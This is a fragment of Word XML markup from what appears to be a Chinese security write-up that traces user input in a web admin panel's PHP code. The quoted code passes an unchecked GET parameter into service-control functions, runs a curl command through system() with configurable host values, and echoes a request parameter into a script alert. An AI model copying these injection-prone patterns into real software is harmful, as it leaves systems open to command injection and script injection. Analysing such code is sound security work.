                      <w:spacing w:val="-7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策略失败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48"/>
                    <w:ind w:left="3843" w:right="50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"window.alert(\"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>激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活策略失败</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>\");</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";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928" w:right="1044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"window.close();"; echo "&lt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/script&gt;"; break;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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'user': 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9802" type="#_x0000_t202" style="width:337.5pt;height:458.3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spacing w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1996" w:firstLine="274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 '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>已启动</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>' != status_service($service_path) ) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="256" w:lineRule="exact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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>服务未启动</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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837" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$proxy = get_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>proxy(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$service_path);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="2928" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$mrtg_enable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proxy[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>mrtg_enable'];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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$mrtg_ip = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>proxy[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'mrtg_ip'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1076" w:right="519"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$mrtg_port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proxy[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'mrtg_port'];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3843" w:right="307" w:hanging="915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 $mrtg_enable == 'On' ) { system( "curl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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>http://$mrtg_ip:$mrtg_port/?ssl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  <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99"/>
                      <w:lang w:eastAsia="zh-CN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719" w:right="882"/>
                    <w:jc w:val="center"/>
                    <w:rPr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else</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-2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65"/>
                    <w:ind w:left="3843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echo "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实时状态查看功能未开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  <w:rPr>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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启</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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716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default</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1235" w:firstLine="2748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alert(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无效参数：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color w:val="333333"/>
                    </w:rPr>
                    <w:t>service_action=".$_GET['</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>service_action']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="44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line="280" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:t>注意这里的参数</w:t>
      </w:r>
      <w:r>
        <w:t>$service_path = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'service_path'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18"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最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$service_path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>进入函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> start_service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sz w:val="21"/>
        </w:rPr>
        <w:t>stop_service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> status_service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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这些函数的定义在文件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/kssl/kssl/WEBUI/www/ssl/service_helper.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，跟进</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s9529" style="position:absolute;margin-left:80.45pt;margin-top:71.85pt;width:338pt;height:563.7pt;z-index:-366784;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1609,1437" coordsize="6760,11274">
            <v:rect id="_x0000_s9801" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9800" style="position:absolute;left:1797;top:1688;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9799" style="position:absolute;left:2761;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9798" style="position:absolute;left:2881;top:1688;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9797" style="position:absolute;left:4568;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9796" style="position:absolute;left:4689;top:1688;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9795" style="position:absolute;left:6255;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9794" style="position:absolute;left:6376;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9793" style="position:absolute" from="1612,1442" to="8366,1442" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9792" style="position:absolute" from="1614,1440" to="1614,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9791" style="position:absolute" from="8364,1445" to="8364,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9790" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9789" style="position:absolute;left:1797;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9788" style="position:absolute" from="1614,1951" to="1614,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9787" style="position:absolute" from="8364,1951" to="8364,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9786" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9785" style="position:absolute;left:1797;top:2340;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9784" style="position:absolute;left:2713;top:2340;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9783" style="position:absolute;left:3436;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9782" style="position:absolute;left:3556;top:2340;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9781" style="position:absolute" from="1614,2277" to="1614,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9780" style="position:absolute" from="8364,2277" to="8364,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9779" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9778" style="position:absolute;left:1797;top:2666;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9777" style="position:absolute;left:2713;top:2666;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9776" style="position:absolute;left:3436;top:2666;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9775" style="position:absolute;left:3556;top:2666;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9774" style="position:absolute" from="1614,2603" to="1614,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9773" style="position:absolute" from="8364,2603" to="8364,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9772" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9771" style="position:absolute;left:1797;top:2962;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9770" style="position:absolute;left:2713;top:2962;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9769" style="position:absolute;left:2954;top:2962;width:675;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9768" style="position:absolute;left:3629;top:2962;width:650;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9767" style="position:absolute;left:4279;top:2962;width:411;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9766" style="position:absolute;left:4690;top:2962;width:1850;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9765" style="position:absolute;left:6540;top:2962;width:964;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9764" style="position:absolute;left:7504;top:2962;width:600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9763" style="position:absolute" from="1614,2929" to="1614,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9762" style="position:absolute" from="8364,2929" to="8364,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9761" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9760" style="position:absolute;left:1797;top:3288;width:650;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9759" style="position:absolute;left:2447;top:3288;width:1978;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9758" style="position:absolute;left:4425;top:3288;width:1000;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9757" style="position:absolute" from="5443,3288" to="5443,3547" strokecolor="#f8f8f8" strokeweight="1.8pt"/>
            <v:rect id="_x0000_s9756" style="position:absolute;left:5461;top:3288;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9755" style="position:absolute" from="1614,3255" to="1614,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9754" style="position:absolute" from="8364,3255" to="8364,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9753" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9752" style="position:absolute;left:1797;top:3644;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9751" style="position:absolute;left:2713;top:3644;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9750" style="position:absolute;left:3315;top:3644;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9749" style="position:absolute;left:3436;top:3644;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9748" style="position:absolute;left:7051;top:3644;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9747" style="position:absolute" from="1614,3581" to="1614,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9746" style="position:absolute" from="8364,3581" to="8364,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9745" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9744" style="position:absolute;left:1797;top:3970;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9743" style="position:absolute;left:5050;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9742" style="position:absolute;left:5171;top:3970;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9741" style="position:absolute;left:5894;top:3970;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9740" style="position:absolute;left:6014;top:3970;width:1085;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9739" style="position:absolute;left:7099;top:3970;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9738" style="position:absolute;left:7219;top:3970;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9737" style="position:absolute;left:7701;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9736" style="position:absolute;left:7822;top:3970;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9735" style="position:absolute" from="1614,3907" to="1614,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9734" style="position:absolute" from="8364,3907" to="8364,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9733" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9732" style="position:absolute;left:1797;top:4296;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9731" style="position:absolute;left:2713;top:4296;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9730" style="position:absolute;left:3556;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9729" style="position:absolute;left:3677;top:4296;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9728" style="position:absolute;left:4159;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9727" style="position:absolute;left:4279;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9726" style="position:absolute;left:4400;top:4296;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9725" style="position:absolute;left:4520;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9724" style="position:absolute" from="1614,4233" to="1614,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9723" style="position:absolute" from="8364,4233" to="8364,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9722" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9721" style="position:absolute;left:1797;top:4622;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9720" style="position:absolute;left:2713;top:4622;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9719" style="position:absolute;left:3195;top:4622;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9718" style="position:absolute;left:3315;top:4622;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9717" style="position:absolute" from="1614,4559" to="1614,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9716" style="position:absolute" from="8364,4559" to="8364,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9715" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9714" style="position:absolute;left:1797;top:4948;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9713" style="position:absolute" from="1614,4885" to="1614,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9712" style="position:absolute" from="8364,4885" to="8364,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9711" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9710" style="position:absolute;left:1797;top:5274;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9709" style="position:absolute;left:2713;top:5274;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9708" style="position:absolute;left:4038;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9707" style="position:absolute;left:4159;top:5274;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9706" style="position:absolute;left:7412;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9705" style="position:absolute;left:7533;top:5274;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9704" style="position:absolute;left:8135;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9703" style="position:absolute" from="1614,5211" to="1614,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9702" style="position:absolute" from="8364,5211" to="8364,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9701" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9700" style="position:absolute;left:1797;top:5600;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9699" style="position:absolute;left:2038;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9698" style="position:absolute;left:2158;top:5600;width:5302;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9697" style="position:absolute;left:7460;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9696" style="position:absolute;left:7581;top:5600;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9695" style="position:absolute;left:7701;top:5600;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9694" style="position:absolute" from="1614,5537" to="1614,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9693" style="position:absolute" from="8364,5537" to="8364,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9692" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9691" style="position:absolute;left:1797;top:5926;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9690" style="position:absolute;left:3122;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9689" style="position:absolute;left:3243;top:5926;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9688" style="position:absolute;left:3725;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9687" style="position:absolute;left:3845;top:5926;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9686" style="position:absolute" from="1614,5863" to="1614,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9685" style="position:absolute" from="8364,5863" to="8364,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9684" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9683" style="position:absolute;left:1797;top:6252;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9682" style="position:absolute;left:2713;top:6252;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9681" style="position:absolute;left:3629;top:6252;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9680" style="position:absolute;left:4352;top:6252;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9679" style="position:absolute;left:4472;top:6252;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9678" style="position:absolute" from="1614,6189" to="1614,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9677" style="position:absolute" from="8364,6189" to="8364,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9676" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9675" style="position:absolute;left:1797;top:6578;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9674" style="position:absolute;left:2713;top:6578;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9673" style="position:absolute;left:3195;top:6578;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9672" style="position:absolute;left:3315;top:6578;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9671" style="position:absolute" from="1614,6515" to="1614,6841" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9670" style="position:absolute" from="8364,6515" to="8364,6841" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9669" style="position:absolute;left:1617;top:6841;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9668" style="position:absolute;left:1797;top:6874;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9667" style="position:absolute;left:2713;top:6874;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9666" style="position:absolute;left:3629;top:6874;width:1446;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9665" style="position:absolute;left:5075;top:6874;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9664" style="position:absolute;left:5195;top:6874;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9663" style="position:absolute;left:5316;top:6874;width:2600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9662" style="position:absolute" from="1614,6841" to="1614,7167" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9661" style="position:absolute" from="8364,6841" to="8364,7167" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9660" style="position:absolute;left:1617;top:7167;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9659" style="position:absolute;left:1797;top:7200;width:200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9658" style="position:absolute;left:1997;top:7200;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9657" style="position:absolute;left:2238;top:7200;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9656" style="position:absolute;left:2358;top:7200;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9655" style="position:absolute" from="1614,7167" to="1614,7493" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9654" style="position:absolute" from="8364,7167" to="8364,7493" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9653" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9652" style="position:absolute;left:1797;top:7556;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9651" style="position:absolute;left:2713;top:7556;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9650" style="position:absolute;left:3629;top:7556;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9649" style="position:absolute;left:4352;top:7556;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9648" style="position:absolute;left:4472;top:7556;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9647" style="position:absolute" from="1614,7493" to="1614,7819" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9646" style="position:absolute" from="8364,7493" to="8364,7819" strokecolor="#ccc" strokeweight=".24pt"/>
